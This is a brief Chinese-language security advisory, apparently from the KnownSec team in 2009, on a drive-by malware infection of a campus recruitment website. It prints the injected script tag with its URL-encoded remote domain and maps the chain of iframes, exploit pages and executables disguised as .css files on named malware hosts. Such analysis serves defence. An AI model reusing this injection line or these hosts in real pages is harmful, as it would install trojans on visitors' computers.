发布时间:Sat Jan 31 2009 20:25:57 UTC+0800
最后更新时间:Sat Jan 31 2009 20:25:57 UTC+0800
________________________________________
知道创宇安全团队(KnownSec team)于今天捕获 江苏校园招聘网(http://www.jsxyzp.com/)被植入恶意代码。

用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.jsxyzp.com/

网页被嵌入恶意链接代码:

 snap1.jpg

<script src=http://3bomb.%63%6Fm/c.js></script>

链接解密后为:http://3bomb.com/c.js

挂马分析:
[wide]http://www.jsxyzp.com/
 [script]http://3bomb.%63%6fm/c.js
  [frame]http://www.2009eeee.cn/llsg/2.htm
   [frame]http://www.710sese.cn/a114/fxx.htm
    [frame]http://www.710sese.cn/a114/fx.htm
    [frame]http://www.710sese.cn/a114/../a1/ss.htm
     [script]http://www.710sese.cn/a114/../a1/woriniss.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/ms06014.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/sina.htm
     [exe]http://d.oixka.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/no.htm
     [script]http://www.710sese.cn/a114/../a1/wokaono.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/bfyy.htm
    [frame]http://www.710sese.cn/a114/../a1/glworld.html
     [script]http://www.710sese.cn/a114/../a1/hohogl.js
      [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.htm
     [exe]http://d.weixk.com/new/a1.css
    [frame]http://www.710sese.cn/a114/../a1/real.html
     [script]http://www.710sese.cn/a114/../a1/realdadong.js
      [exe]http://d.weixk.com/new/a1.css
   [script]http://js.tongji.cn.yahoo.com/860886/ystat.js
  [script]http://js.tongji.cn.yahoo.com/908507/ystat.js
最终下载病毒文件:
http://d.weixk.com/new/a1.css
http://d.oixka.com/new/a1.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

知道创宇安全团队(KnownSec team)建议用户及时安装系统安全更新补丁,使用杀毒软件开启监控保护系统免受病毒侵入。

欢迎使用针对此类挂马攻击的防护程序-365门神,

可到www.365menshen.com下载并试用。

Popularity: 10% [?]